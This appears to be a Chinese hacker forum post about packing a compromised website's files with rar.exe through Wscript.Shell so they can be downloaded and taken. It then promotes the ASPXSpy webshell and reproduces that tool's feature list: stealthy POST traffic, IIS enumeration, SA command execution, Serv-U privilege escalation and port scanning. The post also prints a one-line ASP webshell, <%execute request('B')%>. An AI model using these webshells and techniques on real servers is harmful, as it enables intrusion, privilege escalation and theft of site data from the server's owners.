|
前言:一个很老的话题了,最近好多朋友找我帮忙搞代码,n多关于打包的问题,写篇文章出来,不是新的技术
,只是为了让大家能学到些基本知识,大牛们不要见笑。
〖Wscript.Shell〗
Wscript.Shell方法
[rar.exe路径 a 生成包路径 要打包的目录]
若对方安装了winrar并是默认安装的话 这样命令打包
c:\programe files\winrar\rar.exe a D:\03389.com\www\YinMu.rar D:\03389.com\www
若对方没有安装winrar就传上去一个你的winrar给他,打包方法不变
如我传了一个rar.exe在d盘那么打包命令就变成了
d:\rar.exe a D:\03389.com\www\YinMu.rar D:\03389.com\www
最后再解释一下以上打包的命令执行的结果
运行rar打包 将 D:\03389.com\www 目录中所有文件打包至D:\03389.com\www\ 文件名为YinMu.rar
有时候用ASP马没权限读某些文件和执行WS,可以尝试下用.NET马,是USER权限,一般都可以搞定。这里推荐下Bin大牛的 ASPXSpy 1.0
空闲的时间写的东西,先发布个测试版本,有很多功能还没有添加进去,有时间再说吧!提前祝大家新年快乐!呵呵! 
Readme:
1.开发环境VS2005 + C#,兼容FrameWork1.1/2.0,基本实现代码分离。
2.密码为32位MD5加密(小写) 默认为 admin.
3.采用POST方式提交数据,增强了隐蔽性。
4.添加了IIS探测功能,遍历IIS站点信息。
5.增强了对文件属性的修改。
6.在SQLTools中增加了,SA权限执行系统命令功能,SQL_DIR 功能,可以直接备份log/database,到指定目录。
文件名为bin.asp Shell 为<%execute request("B")%>
7.增加了 Serv-u 提权功能.
8.可以对端口实现单线程扫描。
9.可以对注册表进行简单的读取.
PS: 先发布一个测试版本,有几个功能没有加上,有兴趣的朋友可以测试下,估计很快就会被K,发现BUG可以到www.rootkit.net.cn反馈.
E-mail : master@rootkit.net.net
感谢 Snailsor 的技术支持,还有Fuyu对我的关怀!祝大家新年快乐!
2008年3月4日更新:
感谢bloodsword修正的登入验证,还有读取注册表的两处BUG。下载已经更新!
 点击下载此文件 |
